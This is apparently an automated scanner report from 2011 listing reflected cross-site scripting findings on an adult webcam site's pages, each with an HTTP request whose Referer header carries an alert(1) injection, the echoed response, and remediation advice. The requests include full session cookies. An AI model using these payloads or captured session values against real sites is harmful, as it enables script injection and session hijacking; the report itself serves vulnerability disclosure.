<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... vascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hotfeatures.aspx&he=imlive.com&ul=/live-sex-chats/sex-video-features/&rf=http://www.google.com/search?hl=en^q=b2392'-alert(1)-'0c423d5641&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0352'-alert(1)-'ab159ea3fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shemale-couple/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=f0352'-alert(1)-'ab159ea3fa
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:14 GMT Connection: close Content-Length: 91916 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale-couple/&rf=http://www.google.com/search?hl=en^q=f0352'-alert(1)-'ab159ea3fa&qs=cat=1^roomid=557&qs=cat=1^roomid=557&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2760'-alert(1)-'c5e2447e511 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shemale/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=e2760'-alert(1)-'c5e2447e511
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:39 GMT
Connection: close
Content-Length: 223783
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale/&rf=http://www.google.com/search?hl=en^q=e2760'-alert(1)-'c5e2447e511&qs=cat=1^roomid=51&qs=cat=1^roomid=51&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1836d'-alert(1)-'bf279291bec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/shy-girl/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=1836d'-alert(1)-'bf279291bec
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:05 GMT
Connection: close
Content-Length: 165183
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shy-girl/&rf=http://www.google.com/search?hl=en^q=1836d'-alert(1)-'bf279291bec&qs=cat=1^roomid=160&qs=cat=1^roomid=160&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7aed8'><script>alert(1)</script>84ff86f7007 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /liveexperts.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=7aed8'><script>alert(1)</script>84ff86f7007
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:45 GMT
Connection: close
Content-Length: 19453
Vary: Accept-Encoding
<html> <head> <title>live webcam video chat with experts at imlive</title> <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/liveexperts.asp&lr=1107816009&ud=0&pe=liveexperts.asp&rf=http://www.google.com/search?hl=en^q=7aed8'><script>alert(1)</script>84ff86f7007&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 15f39'><script>alert(1)</script>2c5aaf7e464 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /localcompanionship.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=15f39'><script>alert(1)</script>2c5aaf7e464
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:47 GMT
Connection: close
Content-Length: 16612
Vary: Accept-Encoding
<html> <head> <title>Friends & Romance on Webcam Video Chat at ImLive</title> <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/localcompanionship.asp&lr=1107816009&ud=0&pe=localcompanionship.asp&rf=http://www.google.com/search?hl=en^q=15f39'><script>alert(1)</script>2c5aaf7e464&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 266c7'-alert(1)-'ee0d8af970d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /login.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=266c7'-alert(1)-'ee0d8af970d
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 31ad7'><script>alert(1)</script>1b6d1621049 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /minglesingles.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=31ad7'><script>alert(1)</script>1b6d1621049
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:45 GMT
Connection: close
Content-Length: 16176
Vary: Accept-Encoding
<html> <head> <title>Mingle With Friends on Live Webcam Video Chat at ImLive</title> <meta name="description" content="Mingle with Singles on live webcam video chat - Find a match and go on ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/minglesingles.asp&lr=1107816009&ud=0&pe=minglesingles.asp&rf=http://www.google.com/search?hl=en^q=31ad7'><script>alert(1)</script>1b6d1621049&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fa9af'><script>alert(1)</script>4ba405bce21 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pr.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=fa9af'><script>alert(1)</script>4ba405bce21
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:52 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:52 GMT
Connection: close
Content-Length: 9919
Vary: Accept-Encoding
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 198f8'-alert(1)-'996d2f33bb5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preparesearch.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=198f8'-alert(1)-'996d2f33bb5
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18795'-alert(1)-'f742b451262 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preparesearch.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
